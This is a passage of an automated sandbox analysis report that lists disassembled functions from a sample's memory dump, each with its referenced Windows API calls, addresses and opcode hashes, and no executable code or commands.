Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: b2dcff29992991ec1688cb836b769711e392e16d9f0493a1db7b25b177aba87b
Instruction ID: 1df788644b14a72bb6a2e1bf647fc8660abd518a3930299749d2d08069adb821
Opcode Fuzzy Hash: b2dcff29992991ec1688cb836b769711e392e16d9f0493a1db7b25b177aba87b
Instruction Fuzzy Hash: 87217F716203069BDB209F69DC44E9A77ECAF45720F200A19FCA1E72D0EFB098E5CB51

Function 0026DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0026DB0A
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0026DB5E
__swprintf.LIBCMT ref: 0026DB77
SetErrorMode.KERNEL32(00000000,00000001,00000000,002BDC00), ref: 0026DBB5

Strings

%lu, xrefs: 0026DB71

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 537eb225a3f27ea6e5f143b2f17cce7fbcced971a7c700f6f89e4bb9f60b4f88
Instruction ID: 3a0fa263f518066bd64d3f18b42961a0eb7f11d24e51518a764bb8a565e0f20b
Opcode Fuzzy Hash: 537eb225a3f27ea6e5f143b2f17cce7fbcced971a7c700f6f89e4bb9f60b4f88
Instruction Fuzzy Hash: DF216535A10108AFCB10EFA5DD85DEEBBB8EF49704B104069F509DB251DB71EA51CF61

Function 0025C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0025C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0025C84A
Part of subcall function 0025C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0025C85D
Part of subcall function 0025C82D: GetCurrentThreadId.KERNEL32 ref: 0025C864
Part of subcall function 0025C82D: AttachThreadInput.USER32(00000000), ref: 0025C86B

GetFocus.USER32 ref: 0025CA05

Part of subcall function 0025C876: GetParent.USER32(?), ref: 0025C884

GetClassNameW.USER32(?,?,00000100), ref: 0025CA4E
EnumChildWindows.USER32(?,0025CAC4), ref: 0025CA76
__swprintf.LIBCMT ref: 0025CA90

Strings

%s%d, xrefs: 0025CA8A

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
String ID: %s%d
API String ID: 3187004680-1110647743
Opcode ID: f39c192bc5a9ac71e91ac49bc75c48f031c11981432ae1fe7889fe80b461ba22
Instruction ID: 06a51a022162b21be2e871d5d94aa139deceda0f71b7728efb77adf119b7adf0
Opcode Fuzzy Hash: f39c192bc5a9ac71e91ac49bc75c48f031c11981432ae1fe7889fe80b461ba22
Instruction Fuzzy Hash: 6811B4715203057BCF11BFA09C89FE93B6CAF45705F104066FE19AA182EB749969CF74

Function 00247A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00247AD8

Part of subcall function 00247CF4: __mtinitlocknum.LIBCMT ref: 00247D06
Part of subcall function 00247CF4: EnterCriticalSection.KERNEL32(00000000,?,00247ADD,0000000D), ref: 00247D1F

InterlockedIncrement.KERNEL32(?), ref: 00247AE5
__lock.LIBCMT ref: 00247AF9
___addlocaleref.LIBCMT ref: 00247B17

Strings

`*, xrefs: 00247AA3

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID: `*
API String ID: 1687444384-2514383152
Opcode ID: 10367890a9d976880b6978422b3b43bb20834e03420b9918c23783f48d50b34d
Instruction ID: 67102efdbc8b7d82bb2ac0674f8d90a6514175b63bdae6a37dfa0998d78982cc
Opcode Fuzzy Hash: 10367890a9d976880b6978422b3b43bb20834e03420b9918c23783f48d50b34d
Instruction Fuzzy Hash: D701AD71420B00DFD724DF75D90974AB7F0EF40324F20880EA4AA976A0CBB0AA50CF41

Function 0028E32E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0028E33D
_memset.LIBCMT ref: 0028E34C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,002E3D00,002E3D44), ref: 0028E37B
CloseHandle.KERNEL32 ref: 0028E38D

Strings

D=., xrefs: 0028E346

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: D=.
API String ID: 3277943733-1055701375
Opcode ID: 669625c2555621e119da66f6a857402c14024487671824c92ff3ad999627ed87
Instruction ID: 34ba8efb546c88864a8143e8ec705bfbb1326e3fd535afd62c8b83abbf271786
Opcode Fuzzy Hash: 669625c2555621e119da66f6a857402c14024487671824c92ff3ad999627ed87
Instruction Fuzzy Hash: 04F0BEF0590344BBE300AB61BC8DF7B3E5DDB05712F004021BF08DB1A2D7719E208AA8

Function 00281945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 002819F3
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00281A26
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00281B49
CloseHandle.KERNEL32(?), ref: 00281BBF

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 36ddadf9da97e097e28fa596d8beb4436e839f61126b3fdbbbca09b63e6fa894
Instruction ID: f29c38b3bff5bbf9492679ce00c9e9f2628fac81b76009533f09e56922f8dbec
Opcode Fuzzy Hash: 36ddadf9da97e097e28fa596d8beb4436e839f61126b3fdbbbca09b63e6fa894
Instruction Fuzzy Hash: 8C8176B4620215ABDF10AF54C886BADBBF9AF04724F148459F905AF3C2D7B4A961CF90

Function 0028E062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0028E1D5
SendMessageW.USER32(?,000000B0,?,?), ref: 0028E20D
IsDlgButtonChecked.USER32(?,00000001), ref: 0028E248
GetWindowLongW.USER32(?,000000EC), ref: 0028E269
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0028E281

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend$ButtonCheckedLongWindow
String ID:
API String ID: 3188977179-0
Opcode ID: d68e7e147dd4d1ad458246f3f69da99069917b94ec1ee769f058877d8141c4df
Instruction ID: 06de4fbbd5db9c8136cf76424398646ccacf8839c164622ca3470d0e7c34f16e
Opcode Fuzzy Hash: d68e7e147dd4d1ad458246f3f69da99069917b94ec1ee769f058877d8141c4df
Instruction Fuzzy Hash: 7261B338622245AFDF24EF58C898FAA77BAEF89300F054459F859972E1C770AD60CB10

Function 00261C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00261CB4
VariantClear.OLEAUT32(00000013), ref: 00261D26
VariantClear.OLEAUT32(00000000), ref: 00261D81
VariantClear.OLEAUT32(?), ref: 00261DF8
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00261E26

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 2d0258865f198dc222b4856be96efc7cadbd98514d96df9c1f158b7ee456ff39
Instruction ID: 83af1a4292cab5db7a73ac120aa661b4e436b9e880ff0a06036e8aacea317af2
Opcode Fuzzy Hash: 2d0258865f198dc222b4856be96efc7cadbd98514d96df9c1f158b7ee456ff39
Instruction Fuzzy Hash: C6515AB5A10209EFDB14CF58C884AAAB7B8FF4D314B158559ED59DB300E730EA61CFA0

Function 00280688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0022936C: __swprintf.LIBCMT ref: 002293AB
Part of subcall function 0022936C: __itow.LIBCMT ref: 002293DF

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 002806EE
GetProcAddress.KERNEL32(00000000,?), ref: 0028077D
GetProcAddress.KERNEL32(00000000,00000000), ref: 0028079B
GetProcAddress.KERNEL32(00000000,?), ref: 002807E1
FreeLibrary.KERNEL32(00000000,00000004), ref: 002807FB

Part of subcall function 0023E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0026A574,?,?,00000000,00000008), ref: 0023E675
Part of subcall function 0023E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0026A574,?,?,00000000,00000008), ref: 0023E699

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: fc08c0166aed243d79670b40053f544472f42c87c74fa081628711b8c323e753
Instruction ID: 0b2f7667b908094348c90b260af780f73e27664c4223febf107c418174318586
Opcode Fuzzy Hash: fc08c0166aed243d79670b40053f544472f42c87c74fa081628711b8c323e753
Instruction Fuzzy Hash: E9517A79A10215EFCB00EFA8D485DADF7B5BF09310B158055EA16AB392DB30ED69CF90

Function 00282E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00283C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00282BB5,?,?), ref: 00283C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00282EEF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00282F2E
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00282F75
RegCloseKey.ADVAPI32(?,?), ref: 00282FA1
RegCloseKey.ADVAPI32(00000000), ref: 00282FAE

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: e4816ea742067bd03391f04bf48282f4a74fcdff7d4659839642adc042a33087
Instruction ID: ffddd4d747ec350a9f4cf52846a5726aedf578d42fc62be433008034748d9f56
Opcode Fuzzy Hash: e4816ea742067bd03391f04bf48282f4a74fcdff7d4659839642adc042a33087
Instruction Fuzzy Hash: 2C514975228204EFD704EF94D891E6AB7F9BF88304F10881DF695976A1DB70E928CF52

Function 0028CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06a2057b07396e9f461f7d3ed17f3d8b572235892d29b4c28c26603a70bf0dbd
Instruction ID: f33ae912542347cb4bd0c088dca375f2c01c82e1f92bbd8b43bfcad96e75ad08
Opcode Fuzzy Hash: 06a2057b07396e9f461f7d3ed17f3d8b572235892d29b4c28c26603a70bf0dbd
Instruction Fuzzy Hash: 5F41B43D922115AFC714FF68DC48FA9BF68EB09310F240165F95AA72D1C770AD61DB60

Function 00271206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002712B4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 002712DD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0027131C

Part of subcall function 0022936C: __swprintf.LIBCMT ref: 002293AB
Part of subcall function 0022936C: __itow.LIBCMT ref: 002293DF

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00271341
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00271349

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 921b9adc75ceb4af73c49bcf1297b7a4756e82c096c1bd8065617643c505e568
Instruction ID: ded8a63eb8ef926301e092c5460e60ae462fba6e131cd663ac26df7cd13b5dd3
Opcode Fuzzy Hash: 921b9adc75ceb4af73c49bcf1297b7a4756e82c096c1bd8065617643c505e568
Instruction Fuzzy Hash: CE410B35A10115EFCB01EFA4D985AAEBBF5FF09310B148095E90AAB362CB31ED61DF50

Function 0023B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 0023B64F
ScreenToClient.USER32(00000000,000000FF), ref: 0023B66C
GetAsyncKeyState.USER32(00000001), ref: 0023B691
GetAsyncKeyState.USER32(00000002), ref: 0023B69F

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: be2733026b13e8d66b8ccc62958a058b60960e363004d1442ba94c4f2b723e35
Instruction ID: bae4d40d153ab9a7328781751450707e28a8b9a757441c4ecdc3576a92f86f5f
Opcode Fuzzy Hash: be2733026b13e8d66b8ccc62958a058b60960e363004d1442ba94c4f2b723e35
Instruction Fuzzy Hash: 1A41717551411AFBCF159F64C845AEDBBB8FB05324F104319F82996291CB30AD64EFA1

Function 0025B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0025B369
PostMessageW.USER32(?,00000201,00000001), ref: 0025B413
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0025B41B
PostMessageW.USER32(?,00000202,00000000), ref: 0025B429
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0025B431

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 4b7d3dac5c646d5b5e39ec8eb7477927136b6a91e96f1dc8add1a5f2b3a71c2b
Instruction ID: 41a4c73b1cfe048ae868ccdf2b2260d9820684424b1c8a286c9d7276cdeb7d8d
Opcode Fuzzy Hash: 4b7d3dac5c646d5b5e39ec8eb7477927136b6a91e96f1dc8add1a5f2b3a71c2b
Instruction Fuzzy Hash: F931CE7191021AEBDF14CF68E94DADE3BB5EB05316F104269FC25AA1D1C7B09928CB90

Function 0025DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0025DBD7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0025DBF4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0025DC2C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0025DC52
_wcsstr.LIBCMT ref: 0025DC5C

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: f666b0997d1ea51ac63b8bdcffee0ef06abebf9090246979a4cd329ccdb70352
Instruction ID: fee58d99fefcdebcf330140c9d5063ab522ca25f9c6fe64c4544593eee4335b3
Opcode Fuzzy Hash: f666b0997d1ea51ac63b8bdcffee0ef06abebf9090246979a4cd329ccdb70352
Instruction Fuzzy Hash: 56212571224100ABEB259F38AC49E7B7BACDF45722F10402AFC0ACA091EEB1CC55D664

Function 0028DE69 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 0023B34E: GetWindowLongW.USER32(?,000000EB), ref: 0023B35F

GetWindowLongW.USER32(?,000000F0), ref: 0028DEB0
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0028DED4
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0028DEEC
GetSystemMetrics.USER32(00000004), ref: 0028DF14
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00273A1E,00000000), ref: 0028DF32

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 33ddde0338a6785d873038a94198bdba16c25d8ac7e4010e64bc35a56bb84c44
Instruction ID: edbae05aa2bd750a8f59f572fef22fb14e5f99f451cd913ab8421081d6be2d46
Opcode Fuzzy Hash: 33ddde0338a6785d873038a94198bdba16c25d8ac7e4010e64bc35a56bb84c44
Instruction Fuzzy Hash: 7E21C475622252AFCB246F789C88B6A3798FB25725F150334F927CA9E0D7709874DB80

Function 0025BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0025BC90
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0025BCC2
__itow.LIBCMT ref: 0025BCDA
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0025BD00
__itow.LIBCMT ref: 0025BD11

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 87d190863fa71bc858072b213775de30d3b8238fddcd55a80ca7a748a8b422c3
Instruction ID: e62233e9cf484a2340964965ca8c56cef5a37ad7a26dbc2daf43b51fa301a4cb
Opcode Fuzzy Hash: 87d190863fa71bc858072b213775de30d3b8238fddcd55a80ca7a748a8b422c3
Instruction Fuzzy Hash: 7F210B35621218BFDB11AF649C4AFDE7A78EF4A711F400025FD05EB181DBB08D6987A5

Function 00266318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

